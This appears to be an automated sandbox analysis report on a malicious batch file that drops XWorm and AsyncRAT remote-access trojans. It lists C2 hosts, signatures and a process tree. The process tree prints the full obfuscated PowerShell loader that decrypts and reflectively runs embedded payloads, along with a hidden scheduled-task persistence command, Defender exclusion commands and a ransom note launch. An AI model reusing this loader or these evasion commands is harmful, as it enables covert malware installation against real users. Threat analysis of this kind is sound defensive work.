Analysis
-
max time kernel
86s -
max time network
93s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
04-07-2024 20:01
Static task
static1
General
-
Target
wininit.bat
-
Size
292KB
-
MD5
cf1da3f20349f15bfacf7c271d60684c
-
SHA1
ad4a58069d800ca900c5752929aa92d5d87fe3c7
-
SHA256
ee6dc82f435a2224bcc30034bb5c5827d4470078f5238bf2f6e5a5023528d24f
-
SHA512
8743be3187c9a080cc8fb6ec7243ff98f3d157c4e884503045bc56b0d042ef9a81a127c92a8f80d00b899f3e92c11f9877bd3bdf6c7eeb863d1bb503830cdccd
-
SSDEEP
6144:OFJjDy7sYeIK8ODi9szVwhTvSPOk07BuYfZ2YIOXi/COBNFfIsqJW:OFZSsV88ERrSP+7EQ20QFwJW
Malware Config
Extracted
xworm
super-nearest.gl.at.ply.gg:17835
best-bird.gl.at.ply.gg:27196
wiz.bounceme.net:6000
-
install_file
USB.exe
Extracted
asyncrat
Default
finally-grande.gl.at.ply.gg:25844
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/3828-16-0x000001FA58060000-0x000001FA580A8000-memory.dmp family_xworm behavioral1/memory/1128-53-0x00000170606C0000-0x00000170606DA000-memory.dmp family_xworm C:\Users\Admin\AppData\Local\Temp\mshta.exe family_xworm behavioral1/memory/4572-75-0x0000000000C60000-0x0000000000C78000-memory.dmp family_xworm behavioral1/memory/4572-120-0x000000001CAB0000-0x000000001CABE000-memory.dmp family_xworm -
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/3828-16-0x000001FA58060000-0x000001FA580A8000-memory.dmp family_asyncrat C:\Users\Admin\AppData\Local\Temp\scvhost.exe family_asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 13 1128 powershell.exe 19 1128 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3488 powershell.exe 5024 powershell.exe 2860 powershell.exe 1328 powershell.exe 3828 powershell.exe 3868 powershell.exe 1128 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 2 IoCs
Processes:
scvhost.exemshta.exepid process 3356 scvhost.exe 4572 mshta.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exemshta.exepowershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exepid process 3828 powershell.exe 3828 powershell.exe 3868 powershell.exe 3868 powershell.exe 1128 powershell.exe 1128 powershell.exe 2860 powershell.exe 2860 powershell.exe 1328 powershell.exe 1328 powershell.exe 4572 mshta.exe 3488 powershell.exe 3488 powershell.exe 5024 powershell.exe 5024 powershell.exe 1128 powershell.exe 4220 msedge.exe 4220 msedge.exe 924 msedge.exe 924 msedge.exe 3748 identity_helper.exe 3748 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3828 powershell.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeIncreaseQuotaPrivilege 3868 powershell.exe Token: SeSecurityPrivilege 3868 powershell.exe Token: SeTakeOwnershipPrivilege 3868 powershell.exe Token: SeLoadDriverPrivilege 3868 powershell.exe Token: SeSystemProfilePrivilege 3868 powershell.exe Token: SeSystemtimePrivilege 3868 powershell.exe Token: SeProfSingleProcessPrivilege 3868 powershell.exe Token: SeIncBasePriorityPrivilege 3868 powershell.exe Token: SeCreatePagefilePrivilege 3868 powershell.exe Token: SeBackupPrivilege 3868 powershell.exe Token: SeRestorePrivilege 3868 powershell.exe Token: SeShutdownPrivilege 3868 powershell.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeSystemEnvironmentPrivilege 3868 powershell.exe Token: SeRemoteShutdownPrivilege 3868 powershell.exe Token: SeUndockPrivilege 3868 powershell.exe Token: SeManageVolumePrivilege 3868 powershell.exe Token: 33 3868 powershell.exe Token: 34 3868 powershell.exe Token: 35 3868 powershell.exe Token: 36 3868 powershell.exe Token: SeIncreaseQuotaPrivilege 3868 powershell.exe Token: SeSecurityPrivilege 3868 powershell.exe Token: SeTakeOwnershipPrivilege 3868 powershell.exe Token: SeLoadDriverPrivilege 3868 powershell.exe Token: SeSystemProfilePrivilege 3868 powershell.exe Token: SeSystemtimePrivilege 3868 powershell.exe Token: SeProfSingleProcessPrivilege 3868 powershell.exe Token: SeIncBasePriorityPrivilege 3868 powershell.exe Token: SeCreatePagefilePrivilege 3868 powershell.exe Token: SeBackupPrivilege 3868 powershell.exe Token: SeRestorePrivilege 3868 powershell.exe Token: SeShutdownPrivilege 3868 powershell.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeSystemEnvironmentPrivilege 3868 powershell.exe Token: SeRemoteShutdownPrivilege 3868 powershell.exe Token: SeUndockPrivilege 3868 powershell.exe Token: SeManageVolumePrivilege 3868 powershell.exe Token: 33 3868 powershell.exe Token: 34 3868 powershell.exe Token: 35 3868 powershell.exe Token: 36 3868 powershell.exe Token: SeIncreaseQuotaPrivilege 3868 powershell.exe Token: SeSecurityPrivilege 3868 powershell.exe Token: SeTakeOwnershipPrivilege 3868 powershell.exe Token: SeLoadDriverPrivilege 3868 powershell.exe Token: SeSystemProfilePrivilege 3868 powershell.exe Token: SeSystemtimePrivilege 3868 powershell.exe Token: SeProfSingleProcessPrivilege 3868 powershell.exe Token: SeIncBasePriorityPrivilege 3868 powershell.exe Token: SeCreatePagefilePrivilege 3868 powershell.exe Token: SeBackupPrivilege 3868 powershell.exe Token: SeRestorePrivilege 3868 powershell.exe Token: SeShutdownPrivilege 3868 powershell.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeSystemEnvironmentPrivilege 3868 powershell.exe Token: SeRemoteShutdownPrivilege 3868 powershell.exe Token: SeUndockPrivilege 3868 powershell.exe Token: SeManageVolumePrivilege 3868 powershell.exe Token: 33 3868 powershell.exe Token: 34 3868 powershell.exe Token: 35 3868 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid process 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe 924 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
mshta.exepowershell.exepid process 4572 mshta.exe 1128 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exemshta.exemsedge.exedescription pid process target process PID 3416 wrote to memory of 1140 3416 cmd.exe cmd.exe PID 3416 wrote to memory of 1140 3416 cmd.exe cmd.exe PID 3416 wrote to memory of 3828 3416 cmd.exe powershell.exe PID 3416 wrote to memory of 3828 3416 cmd.exe powershell.exe PID 3828 wrote to memory of 3868 3828 powershell.exe powershell.exe PID 3828 wrote to memory of 3868 3828 powershell.exe powershell.exe PID 3828 wrote to memory of 5064 3828 powershell.exe WScript.exe PID 3828 wrote to memory of 5064 3828 powershell.exe WScript.exe PID 5064 wrote to memory of 2812 5064 WScript.exe cmd.exe PID 5064 wrote to memory of 2812 5064 WScript.exe cmd.exe PID 2812 wrote to memory of 2436 2812 cmd.exe cmd.exe PID 2812 wrote to memory of 2436 2812 cmd.exe cmd.exe PID 2812 wrote to memory of 1128 2812 cmd.exe powershell.exe PID 2812 wrote to memory of 1128 2812 cmd.exe powershell.exe PID 1128 wrote to memory of 3356 1128 powershell.exe scvhost.exe PID 1128 wrote to memory of 3356 1128 powershell.exe scvhost.exe PID 1128 wrote to memory of 4572 1128 powershell.exe mshta.exe PID 1128 wrote to memory of 4572 1128 powershell.exe mshta.exe PID 4572 wrote to memory of 2860 4572 mshta.exe powershell.exe PID 4572 wrote to memory of 2860 4572 mshta.exe powershell.exe PID 4572 wrote to memory of 1328 4572 mshta.exe powershell.exe PID 4572 wrote to memory of 1328 4572 mshta.exe powershell.exe PID 1128 wrote to memory of 3488 1128 powershell.exe powershell.exe PID 1128 wrote to memory of 3488 1128 powershell.exe powershell.exe PID 1128 wrote to memory of 5024 1128 powershell.exe powershell.exe PID 1128 wrote to memory of 5024 1128 powershell.exe powershell.exe PID 1128 wrote to memory of 924 1128 powershell.exe msedge.exe PID 1128 wrote to memory of 924 1128 powershell.exe msedge.exe PID 924 wrote to memory of 628 924 msedge.exe msedge.exe PID 924 wrote to memory of 628 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe PID 924 wrote to memory of 3428 924 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wininit.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7JNVAI/bOCfTrc9Cyv1KrVXb/edm5Def39ZXQyWYIiY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cjJ5rTvtiS42ynBUE3pozA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Ludab=New-Object System.IO.MemoryStream(,$param_var); $svcPY=New-Object System.IO.MemoryStream; $oCbKk=New-Object System.IO.Compression.GZipStream($Ludab, [IO.Compression.CompressionMode]::Decompress); $oCbKk.CopyTo($svcPY); $oCbKk.Dispose(); $Ludab.Dispose(); $svcPY.Dispose(); $svcPY.ToArray();}function execute_function($param_var,$param2_var){ $WLpRi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $urgeW=$WLpRi.EntryPoint; $urgeW.Invoke($null, $param2_var);}$JiVki = 'C:\Users\Admin\AppData\Local\Temp\wininit.bat';$host.UI.RawUI.WindowTitle = $JiVki;$BrRJc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JiVki).Split([Environment]::NewLine);foreach ($Ioscd in $BrRJc) { if ($Ioscd.StartsWith('gAlOrZETIRGuyGxGQovI')) { $LUETq=$Ioscd.Substring(20); break; }}$payloads_var=[string[]]$LUETq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_79_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_79.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_79.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_79.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7JNVAI/bOCfTrc9Cyv1KrVXb/edm5Def39ZXQyWYIiY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cjJ5rTvtiS42ynBUE3pozA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Ludab=New-Object System.IO.MemoryStream(,$param_var); $svcPY=New-Object System.IO.MemoryStream; $oCbKk=New-Object System.IO.Compression.GZipStream($Ludab, [IO.Compression.CompressionMode]::Decompress); $oCbKk.CopyTo($svcPY); $oCbKk.Dispose(); $Ludab.Dispose(); $svcPY.Dispose(); $svcPY.ToArray();}function execute_function($param_var,$param2_var){ $WLpRi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $urgeW=$WLpRi.EntryPoint; $urgeW.Invoke($null, $param2_var);}$JiVki = 'C:\Users\Admin\AppData\Roaming\Windows_Log_79.bat';$host.UI.RawUI.WindowTitle = $JiVki;$BrRJc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JiVki).Split([Environment]::NewLine);foreach ($Ioscd in $BrRJc) { if ($Ioscd.StartsWith('gAlOrZETIRGuyGxGQovI')) { $LUETq=$Ioscd.Substring(20); break; }}$payloads_var=[string[]]$LUETq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\scvhost.exe"C:\Users\Admin\AppData\Local\Temp\scvhost.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\mshta.exe"C:\Users\Admin\AppData\Local\Temp\mshta.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mshta.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcac3146f8,0x7ffcac314708,0x7ffcac3147187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:27⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:17⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD509c7ae658385f6de986103443217840b
SHA1298d880503edce4413337c09d3525f27a2edcd28
SHA25691e04ec38abdb0204458543592c4621b7bc0306407884f764aa9596a52454cd7
SHA5124e1272b209487d1e9e7d8502be49ebce91c76718410e817b3ac7faf47d9b699210aab1b941fbb5ddafc192ddf4b2ba151afd47fab753ec62bc0bca36039c55c3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD53c78617ec8f88da19254f9ff03312175
SHA1344e9fed9434d924d1c9f05351259cbc21e434d3
SHA2563cb47fcdca33bb3c8f4acc98424140987235ad79815da4f0e7593e4591ae90ed
SHA5125b58675088b0fc2b2d705cb648ea89385b80c7cf908b0f4f95a9acdbd350b50754e1b586202db6a918eef70029fafb210947f3c43c570ecf7657e08939fd7e9c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD541a7f109bd69c83731c6bc9a8183b6ef
SHA18df7b03f98718d791fae0fd41ce0b38f09886afd
SHA2565afe320f7c930d44c01e519cd611b39b8af99dd2459d7e985c99d7a4ae5fc2d8
SHA5127b7d187170c21b759aead85510f1fa36cdac95587ef1640bfab3588459706e11a09e711f86650f2d4ae6e4d0c84affdb906924ddd470a0875161fa2c16048404
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5839ce5ae0ef78a63eed3baca576fd8c4
SHA1cb2ab6a63cfb45caa559476bbaf585fcd54d2dc0
SHA256985d54a9ec3d0207a5438ae79bd0e245b113019c0e74572d174d5c2a03a6ab47
